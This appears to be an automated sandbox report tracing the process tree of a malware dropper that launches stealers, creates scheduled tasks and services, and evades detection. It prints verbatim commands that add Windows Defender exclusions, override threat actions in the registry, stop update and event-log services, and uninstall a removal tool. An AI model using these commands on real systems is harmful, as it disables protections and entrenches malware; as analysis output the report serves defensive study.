PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2176 wrote to memory of 812	2176	axplons.exe	110
PID 2176 wrote to memory of 812	2176	axplons.exe	110
PID 2176 wrote to memory of 812	2176	axplons.exe	110
PID 2176 wrote to memory of 1152	2176	axplons.exe	112
PID 2176 wrote to memory of 1152	2176	axplons.exe	112
PID 2176 wrote to memory of 1152	2176	axplons.exe	112
PID 1152 wrote to memory of 4740	1152	install.exe	114
PID 1152 wrote to memory of 4740	1152	install.exe	114
PID 1152 wrote to memory of 4740	1152	install.exe	114
PID 4740 wrote to memory of 1656	4740	cmd.exe	117
PID 4740 wrote to memory of 1656	4740	cmd.exe	117
PID 4740 wrote to memory of 1656	4740	cmd.exe	117
PID 4740 wrote to memory of 3820	4740	cmd.exe	118
PID 4740 wrote to memory of 3820	4740	cmd.exe	118
PID 4740 wrote to memory of 3820	4740	cmd.exe	118
PID 4740 wrote to memory of 4808	4740	cmd.exe	119
PID 4740 wrote to memory of 4808	4740	cmd.exe	119
PID 4740 wrote to memory of 4808	4740	cmd.exe	119
PID 4740 wrote to memory of 3852	4740	cmd.exe	120
PID 4740 wrote to memory of 3852	4740	cmd.exe	120
PID 4740 wrote to memory of 3852	4740	cmd.exe	120
PID 4740 wrote to memory of 1064	4740	cmd.exe	133
PID 4740 wrote to memory of 1064	4740	cmd.exe	133
PID 4740 wrote to memory of 1064	4740	cmd.exe	133
PID 4740 wrote to memory of 2632	4740	cmd.exe	122
PID 4740 wrote to memory of 2632	4740	cmd.exe	122
PID 4740 wrote to memory of 2632	4740	cmd.exe	122
PID 1084 wrote to memory of 4956	1084	GameService.exe	125
PID 1084 wrote to memory of 4956	1084	GameService.exe	125
PID 4956 wrote to memory of 4540	4956	GameSyncLink.exe	138

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
"C:\Users\Admin\AppData\Local\Temp\99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4044
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
    "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:316
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks computer location settings
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1740
    - - C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:368
    - - C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1208
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:3332
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:1280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 316 -s 332
      4⤵
      Program crash
      PID:5096
- - C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3820
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4044
- - C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:812
- - C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1152
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4740
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        5⤵
        Launches sc.exe
        
        PID:1656
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        5⤵
        Executes dropped EXE
        
        PID:3820
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        5⤵
        Launches sc.exe
        
        PID:4808
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        5⤵
        Executes dropped EXE
        
        PID:3852
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:1064
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        5⤵
        Executes dropped EXE
        
        PID:2632
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
      4⤵
      PID:2896
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        5⤵
        Launches sc.exe
        
        PID:4536
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        5⤵
        Executes dropped EXE
        
        PID:1064
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        5⤵
        Launches sc.exe
        
        PID:1876
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        5⤵
        Executes dropped EXE
        
        PID:1776
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        5⤵
        Executes dropped EXE
        
        PID:1724
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        5⤵
        Executes dropped EXE
        
        PID:4292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
      4⤵
      PID:464
    - - C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        5⤵
        Launches sc.exe
        
        PID:2848
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        5⤵
        Executes dropped EXE
        
        PID:4480
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        5⤵
        Executes dropped EXE
        
        PID:3408
    - - C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        5⤵
        Executes dropped EXE
        
        PID:2460
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      4⤵
      PID:5044
- - C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
    "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4248
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2668
- - C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2368
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2244
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1596
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1292
- - C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
    "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:1656
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:3668
- - C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe
    "C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3556
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"
      4⤵
      Creates scheduled task(s)
      PID:4336
- - C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4200
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4264
    - - C:\Users\Admin\Pictures\Cr8tgrigb93jSsG8dAiSbRvc.exe
        
        "C:\Users\Admin\Pictures\Cr8tgrigb93jSsG8dAiSbRvc.exe"
        5⤵
        Executes dropped EXE
        
        PID:4332
    - - C:\Users\Admin\Pictures\gnBvYBdk5otAi7W2JDiZ2A1N.exe
        
        "C:\Users\Admin\Pictures\gnBvYBdk5otAi7W2JDiZ2A1N.exe"
        5⤵
        Executes dropped EXE
        
        PID:1520
    - - C:\Users\Admin\Pictures\qoW1cc3lA1nTUNFRjDRTRosr.exe
        
        "C:\Users\Admin\Pictures\qoW1cc3lA1nTUNFRjDRTRosr.exe"
        5⤵
        Executes dropped EXE
        
        PID:732
    - - C:\Users\Admin\Pictures\97ZQ5W9JRcOofRJeHJdny1qu.exe
        
        "C:\Users\Admin\Pictures\97ZQ5W9JRcOofRJeHJdny1qu.exe"
        5⤵
        Executes dropped EXE
        
        PID:1152
    - - C:\Users\Admin\Pictures\D48g6gzWyH8AkaodcKyWRpR6.exe
        
        "C:\Users\Admin\Pictures\D48g6gzWyH8AkaodcKyWRpR6.exe"
        5⤵
        Executes dropped EXE
        
        PID:4960
      - C:\Users\Admin\AppData\Local\Temp\7zS33AD.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        6⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:4372
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:3512
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:1400
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:4824
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:3304
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:1400
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:3624
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:4424
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:1404
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5400
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5360
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS33AD.tmp\Install.exe\" it /WkxdidMIuX 385118 /S" /V1 /F
        7⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5684
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        7⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        8⤵
        
        PID:5900
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        9⤵
        
        PID:5932
    - - C:\Users\Admin\Pictures\7EhPCHLwVUzTFL9SfbnUelQh.exe
        
        "C:\Users\Admin\Pictures\7EhPCHLwVUzTFL9SfbnUelQh.exe"
        5⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:996
    - - C:\Users\Admin\Pictures\FHdvWGF7ZGRXq7kekdXjARbr.exe
        
        "C:\Users\Admin\Pictures\FHdvWGF7ZGRXq7kekdXjARbr.exe"
        5⤵
        Executes dropped EXE
        
        PID:4804
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:5980
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:5156
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:5132
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:5900
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1968
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:5580
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:6040
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        
        PID:3320
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        
        PID:2636
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        
        PID:5320
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        
        PID:3340
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        6⤵
        Launches sc.exe
        
        PID:5272
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:5568
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:5312
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        6⤵
        Launches sc.exe
        
        PID:4904
    - - C:\Users\Admin\Pictures\dpoEmdz2XqDtLseWNP6gEmhw.exe
        
        "C:\Users\Admin\Pictures\dpoEmdz2XqDtLseWNP6gEmhw.exe"
        5⤵
        Executes dropped EXE
        
        PID:5284
      - C:\Users\Admin\AppData\Local\Temp\7zS562A.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        6⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5348
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:5704
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:5776
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:5940
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:6132
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:5324
        
